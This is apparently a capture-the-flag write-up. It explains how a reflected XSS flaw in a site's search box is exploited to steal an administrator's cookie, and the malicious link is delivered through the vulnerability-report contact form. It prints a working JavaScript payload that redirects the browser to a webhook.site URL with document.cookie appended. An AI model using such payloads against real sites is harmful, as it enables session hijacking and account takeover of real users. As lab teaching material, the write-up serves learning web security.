Can you steal the cookie of the administrator who visits the pages?
Solving the challenge
While exploring a little the functionalities of the site, we notice a contact page allowing to report a vulnerability to the administrators of the site.
This is very interesting because it can allow us a Cross Site Scripting (XSS) attack to retrieve cookies from the administrator.
First, we need to find an entry vulnerable to a Cross Site Scripting (XSS) attack. Bingo, the search box does not filter user data and allows XSS. If we enter this payload in the search bar:
We get an XSS:
We are therefore going to create a payload to exfiltrate the cookies of the browser that visits the page. To do so, I used the site webhook.site allowing to receive HTTP requests and therefore very useful for exfiltrating cookies. To force the browser to change page, just change the value of the
<script> window.location="https://webhook.site/ca1e06eb-8390-41d5-8f8b-0dff4baafcda/?c="+document.cookie </script>
Then, we have to URLencode this payload, and to place it in the
search parameter passed in GET request written in the URL:
Then we send this URL to the administrator via the contact form to report a vulnerability, and we just have to wait for the administrator to access our link.
A few minutes later, we see a request appear in the webhook.site:
And we see the flag in the exfiltrated cookies: